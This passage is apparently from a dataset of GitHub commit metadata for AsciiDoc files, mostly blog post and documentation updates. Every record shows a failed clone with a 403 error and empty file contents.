commit messages for the team.\nStandard based off of gist 
from\nhttps:\/\/gist.github.com\/robertpainsi\/b632364184e70900af4ab688decf6f53\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Development-Guide\/Making-Commit-Messages\/Making-Commit-Messages.adoc","new_file":"Development-Guide\/Making-Commit-Messages\/Making-Commit-Messages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"4d72b72d095fcc2d5ab7952ae4b629608f3c84f5","subject":"Update 2016-03-09-fork-spawnchild-exec-Node-J-S.adoc","message":"Update 2016-03-09-fork-spawnchild-exec-Node-J-S.adoc","repos":"flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io","old_file":"_posts\/2016-03-09-fork-spawnchild-exec-Node-J-S.adoc","new_file":"_posts\/2016-03-09-fork-spawnchild-exec-Node-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flavienliger\/flavienliger.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6795642cc53b82578356c8a726ae07c3f667992","subject":"Renamed '_posts\/2018-01-09-Flutter-Report-January-2018.adoc' to '_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc'","message":"Renamed '_posts\/2018-01-09-Flutter-Report-January-2018.adoc' to '_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc'","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc","new_file":"_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e164b08b7d86c0df4f6a614dd80cfc66e521abc1","subject":"y2b create post The 50 Cent Interview","message":"y2b create post The 50 Cent Interview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-10-The-50-Cent-Interview.adoc","new_file":"_posts\/2014-01-10-The-50-Cent-Interview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5233beb86553fb7849ebd6d1a2b0b3e493ddc02","subject":"Update 2015-11-06-Yeah-About-that-story.adoc","message":"Update 2015-11-06-Yeah-About-that-story.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-06-Yeah-About-that-story.adoc","new_file":"_posts\/2015-11-06-Yeah-About-that-story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45ed0d118320e91ef57f87f122b102864b307adf","subject":"Update 2016-02-20-Comecando-com-Cordova.adoc","message":"Update 
2016-02-20-Comecando-com-Cordova.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80680401de3ad56b2938ed845b8ca4fee06bab38","subject":"create post Unboxing Google Home Mini With Demar DeRozan!","message":"create post Unboxing Google Home Mini With Demar DeRozan!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unboxing-Google-Home-Mini-With-Demar-DeRozan!.adoc","new_file":"_posts\/2018-02-26-Unboxing-Google-Home-Mini-With-Demar-DeRozan!.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e5427a21d76711b509c35d94e9c164d0370dadd","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","message":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1840262f9191d50bf87380cbc14540a2e4ff7ba2","subject":"Update 2016-12-08-Review-Lean-Startup-Primeiros-passos-da-sua-startup-enxuta.adoc","message":"Update 2016-12-08-Review-Lean-Startup-Primeiros-passos-da-sua-startup-enxuta.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2016-12-08-Review-Lean-Startup-Primeiros-passos-da-sua-startup-enxuta.adoc","new_file":"_posts\/2016-12-08-Review-Lean-Startup-Primeiros-passos-da-sua-startup-enxuta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8bc5facae6544dca893b0ccd81db070f8d311f6","subject":"Initial documentation commit","message":"Initial documentation commit\n","repos":"wildfly\/wildfly-http-client","old_file":"docs\/wire-spec-v1.asciidoc","new_file":"docs\/wire-spec-v1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly\/wildfly-http-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"074b8282a5919b16e461cac3a3a95d5c489bbc8a","subject":"Update 2016-09-06-TWCTF.adoc","message":"Update 
2016-09-06-TWCTF.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF.adoc","new_file":"_posts\/2016-09-06-TWCTF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c693b6da33f4aca11f58393d131e5619d820e5e","subject":"Python note: check module existence","message":"Python note: check module existence\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dee7cb172b652548aef0b899a983986769a3ee60","subject":"Add IPython startup script","message":"Add IPython startup script\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d50eead77f2eb278fc166b1d9f298d13a5fcca71","subject":"Added readme","message":"Added readme\n","repos":"griffon-plugins\/griffon-preferences-plugin,hackergarten\/griffon-preferences-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/griffon-plugins\/griffon-preferences-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78e9c8d2e32344f5ac913a55633faff55723bb40","subject":"Create README.adoc","message":"Create README.adoc","repos":"ajneu\/basewrapper_ctor_dtor_monitoring","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/basewrapper_ctor_dtor_monitoring.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a42c0fa3dd441d9126c7173066491652c3419548","subject":"Add a simple README for now","message":"Add a simple README for now\n","repos":"reiseburo\/beetle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reiseburo\/beetle.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71e276dddfa10031fa6df495b62b7f5f5a2d7498","subject":"empty README","message":"empty README\n","repos":"jdigger\/jgit-process","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jdigger\/jgit-process.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8e70285b3bcdaa97c2e6f57c9f9732b5da0f6c87","subject":"Added README.adoc symlink for Github.","message":"Added README.adoc symlink for Github.\n","repos":"Yubico\/yubikey-neo-manager,Yubico\/yubikey-neo-manager","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/Yubico\/yubikey-neo-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"16dfefa330a2d8cf3a68b7c62c730df48f8c19e1","subject":"Updated docs","message":"Updated docs\n","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdf337fc0442d1fabfecc5e817188486de184af5","subject":"y2b create post You Will Want This New Electric Skateboard","message":"y2b create post You Will Want This New Electric Skateboard","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-28-You-Will-Want-This-New-Electric-Skateboard.adoc","new_file":"_posts\/2017-05-28-You-Will-Want-This-New-Electric-Skateboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f7822ad544a099cde309a3127a3e09cf7e36a2a","subject":"Add Angular 2 documentation section","message":"Add Angular 2 documentation section\n","repos":"vaadin\/vaadin-upload,vaadin\/vaadin-upload","old_file":"docs\/vaadin-upload-angular2.adoc","new_file":"docs\/vaadin-upload-angular2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/vaadin-upload.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73be80ead24e052922896f147003cceb955e0c5e","subject":"Delete the file at '_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc'","message":"Delete the file at '_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08df169fb2805ce1f19a10e72921af9b23793264","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 
2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75550a23ab0c1c9fafdbc73a32fb665eeb689729","subject":"Docs: Fixed bad Shield links","message":"Docs: Fixed bad Shield links\n\nOriginal commit: elastic\/x-pack-elasticsearch@c61133ed12962fc4046642c0727bbc0a394c4b1d\n","repos":"scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch","old_file":"watcher\/docs\/administering-watcher\/integrating-with-shield.asciidoc","new_file":"watcher\/docs\/administering-watcher\/integrating-with-shield.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf5c3855f4598ad77277055bb814ef7524f48cea","subject":"Update 2018-10-30-Solucionar-problema-No-more-space-for-virtual-disk.adoc","message":"Update 2018-10-30-Solucionar-problema-No-more-space-for-virtual-disk.adoc","repos":"siarlex\/siarlex.github.io,siarlex\/siarlex.github.io,siarlex\/siarlex.github.io,siarlex\/siarlex.github.io","old_file":"_posts\/2018-10-30-Solucionar-problema-No-more-space-for-virtual-disk.adoc","new_file":"_posts\/2018-10-30-Solucionar-problema-No-more-space-for-virtual-disk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/siarlex\/siarlex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2429df086ca5844ee524d7f03865578d08ceeac","subject":"update docs","message":"update 
docs\n","repos":"Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java","old_file":"docs\/website\/netcdf-java\/reference\/FeatureDatasets\/PointFeatures.adoc","new_file":"docs\/website\/netcdf-java\/reference\/FeatureDatasets\/PointFeatures.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Unidata\/netcdf-java.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"e7bf4d7d933e4ecf2fc198da256bbeb8fb82f88f","subject":"Update 2016-04-08-First-Post.adoc","message":"Update 2016-04-08-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-First-Post.adoc","new_file":"_posts\/2016-04-08-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a41ca238d4e206dd94de19d3866b2396f76ca5d2","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31345353e6d038faa7bed85cacd32b9b7f55b4a","subject":"Update 2020-01-05-dark-blue.adoc","message":"Update 2020-01-05-dark-blue.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-01-05-dark-blue.adoc","new_file":"_posts\/2020-01-05-dark-blue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d87870d665d983dbe50c09e99c64a2dd990b2ba0","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21b2d3544cd5fae478785c5f4500e229225453d4","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 
2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9553106b58280daf6403f4eb7242fce3616ad074","subject":"Delete the file at '_posts\/2016-03-04-New-Server.adoc'","message":"Delete the file at '_posts\/2016-03-04-New-Server.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-Server.adoc","new_file":"_posts\/2016-03-04-New-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c26e52d2b012cb5764bf192cfa2f05c5637203e","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00fe13c1d01accb1673b4424e647fc929111f114","subject":"Update 2016-08-23-First-post.adoc","message":"Update 2016-08-23-First-post.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2016-08-23-First-post.adoc","new_file":"_posts\/2016-08-23-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28fcdd1a4d1cc3e6488110f5f8436dde05c21b83","subject":"Update 2017-01-01-Blog-Title.adoc","message":"Update 2017-01-01-Blog-Title.adoc","repos":"mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io","old_file":"_posts\/2017-01-01-Blog-Title.adoc","new_file":"_posts\/2017-01-01-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mmhchan\/mmhchan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87e895bcbda3461a0a8fba557d1172ad7689cd8e","subject":"Update 2017-07-17-Who-We-Are.adoc","message":"Update 2017-07-17-Who-We-Are.adoc","repos":"Asastry1\/inflect-blog,Asastry1\/inflect-blog,Asastry1\/inflect-blog,Asastry1\/inflect-blog","old_file":"_posts\/2017-07-17-Who-We-Are.adoc","new_file":"_posts\/2017-07-17-Who-We-Are.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Asastry1\/inflect-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e867dfabff8b6d84af4eb9f2a720f766c691d4a1","subject":"[DOCS] Add token filter reference docs template (#52290)","message":"[DOCS] Add token filter reference docs template (#52290)\n\nCreates a reusable template for token filter reference documentation.\r\n\r\nContributors can make a copy of this template and customize it when\r\ndocumenting new token filters.","repos":"gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/_token-filter-template.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/_token-filter-template.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1076685abbcfd27b438fb1a591bd8d5da6048f16","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16b4d7854501ceb04038b2787a87175ba3b466c4","subject":"Added secureXML Dataformat docs to Gitbook","message":"Added secureXML Dataformat docs to 
Gitbook\n","repos":"jamesnetherton\/camel,tkopczynski\/camel,sabre1041\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,driseley\/camel,nicolaferraro\/camel,zregvart\/camel,gnodet\/camel,prashant2402\/camel,adessaigne\/camel,akhettar\/camel,prashant2402\/camel,scranton\/camel,neoramon\/camel,mgyongyosi\/camel,objectiser\/camel,prashant2402\/camel,NickCis\/camel,mcollovati\/camel,pkletsko\/camel,bgaudaen\/camel,scranton\/camel,driseley\/camel,dmvolod\/camel,dmvolod\/camel,tkopczynski\/camel,gnodet\/camel,adessaigne\/camel,gilfernandes\/camel,nicolaferraro\/camel,jkorab\/camel,kevinearls\/camel,jonmcewen\/camel,NickCis\/camel,nboukhed\/camel,pmoerenhout\/camel,scranton\/camel,davidkarlsen\/camel,cunningt\/camel,onders86\/camel,christophd\/camel,lburgazzoli\/apache-camel,bgaudaen\/camel,salikjan\/camel,tlehoux\/camel,tdiesler\/camel,ssharma\/camel,gilfernandes\/camel,DariusX\/camel,gilfernandes\/camel,pax95\/camel,pkletsko\/camel,yuruki\/camel,hqstevenson\/camel,jkorab\/camel,dmvolod\/camel,Thopap\/camel,snurmine\/camel,tadayosi\/camel,bgaudaen\/camel,Thopap\/camel,CodeSmell\/camel,gautric\/camel,anoordover\/camel,Thopap\/camel,Thopap\/camel,onders86\/camel,mgyongyosi\/camel,pmoerenhout\/camel,anoordover\/camel,prashant2402\/camel,tdiesler\/camel,jamesnetherton\/camel,pkletsko\/camel,jamesnetherton\/camel,tadayosi\/camel,jkorab\/camel,cunningt\/camel,rmarting\/camel,allancth\/camel,tadayosi\/camel,rmarting\/camel,driseley\/camel,lburgazzoli\/camel,chirino\/camel,apache\/camel,christophd\/camel,allancth\/camel,anoordover\/camel,tadayosi\/camel,lburgazzoli\/apache-camel,jkorab\/camel,jamesnetherton\/camel,jkorab\/camel,tadayosi\/camel,jarst\/camel,apache\/camel,gautric\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,drsquidop\/camel,JYBESSON\/camel,yuruki\/camel,tdiesler\/camel,tlehoux\/camel,snurmine\/camel,ullgren\/camel,chirino\/camel,nicolaferraro\/camel,JYBESSON\/camel,bhaveshdt\/camel,adessaigne\/camel,lburgazzoli\/apache-camel,onders86\/camel,gautric\/camel,tlehoux\/camel,gautric\/camel,acartapanis\/camel,nboukhed\/camel,rmarting\/camel,sirlatrom\/camel,sabre1041\/camel,jonmcewen\/camel,w4tson\/camel,gilfernandes\/camel,prashant2402\/camel,bhaveshdt\/camel,tlehoux\/camel,veithen\/camel,w4tson\/camel,bhaveshdt\/camel,rmarting\/camel,pax95\/camel,adessaigne\/camel,tkopczynski\/camel,adessaigne\/camel,objectiser\/camel,sabre1041\/camel,isavin\/camel,scranton\/camel,pmoerenhout\/camel,hqstevenson\/camel,curso007\/camel,sirlatrom\/camel,sirlatrom\/camel,drsquidop\/camel,anoordover\/camel,NickCis\/camel,chirino\/camel,bhaveshdt\/camel,isavin\/camel,jamesnetherton\/camel,cunningt\/camel,mcollovati\/camel,bgaudaen\/camel,isavin\/camel,mgyongyosi\/camel,Fabryprog\/camel,JYBESSON\/camel,nicolaferraro\/camel,mgyongyosi\/camel,JYBESSON\/camel,neoramon\/camel,pmoerenhout\/camel,drsquidop\/camel,nikhilvibhav\/camel,anton-k11\/camel,tkopczyns